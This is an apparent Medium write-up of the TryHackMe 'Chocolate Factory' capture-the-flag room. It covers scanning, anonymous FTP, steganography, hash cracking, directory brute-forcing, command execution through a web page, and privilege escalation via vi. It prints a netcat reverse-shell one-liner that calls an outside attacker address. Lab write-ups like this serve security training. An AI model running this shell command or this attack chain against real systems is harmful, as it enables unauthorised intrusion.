THM | Chocolate Factory

Hello everyone.so,after a long time i’m writing this writeup.This one is from Tryhackme.For this room,we need to have little bit knowledge on stegno.So let’s begin the hunt.Basically this is a beginner friendly room.In my opinion it is very easy to solve.

i’m using kali linux as my attacker machine and connected through VPN to tryhackme

First things,let’s find the open ports and services that are running.

“nmap -sC -sV 10.10.104.210 -vv -oN scan”

This scan gave us some open ports and services and their versions that are running.

Above is the scan result.SO now let’s explore the ftp.as we can see anonymous login is allowed.so,let’s login and find what is there.

We logged in as anonymous user.now let’s list the files in the ftp server.

So we have image.So let’s download this image to our main machine and analyze it.

It’s downloaded.Now let’s find anything is hidden or not.

Yes,there is some king of weired text file is embeded.So,let’s extract it using steghide.

Now let’s find what’s inside.so it’s a base64 encoded text.So,let’s decode it.

“cat b64.txt| base64 -d |tee decoded.txt”

We found some hashes here.So let’s crack the hash using hashcat.

“hashcat hash -m 1800 /usr/share/wordlists/rockyou.txt”

While this is running let’s explore the website.

There is a login page.But we don’t know the credentials.Let’s enumerate further.

Let’s user gobuster to find the file.

gobuster dir -u http://10.10.104.210 -w /usr/share/wordlists/dirb/big.txt -t 50 -x .txt,.php,.html

SO this got me this.

There is an interesting file home.php.so let’s open it.

So ,wow,we can execute commands from here.So let’s get a shell.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.78.2 4242 >/tmp/f

so we are in.

So let’s convert this shell into tty bash shell.

if check validate.php we’ll find a password for the user charlie.so let’s try to login as charlie.But failed.so let’s go to the user directory. So i found a ssh private and public keys in charlie’s directory .Let’s login as charlie using those keys.

NOw let’s root the box.unfortunately charlie can run vi as root.

So to get the root.

Yes i’m the owner of this factory now.We can also complete this box in another way.But i found this way is quite interesting to hack in.I hope you guys enjoy this one.

HAPPY HACKING & HUNTING.

STAY HOME & STAY SAFE & KEEP HACKING :>

THANK YOU……..

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store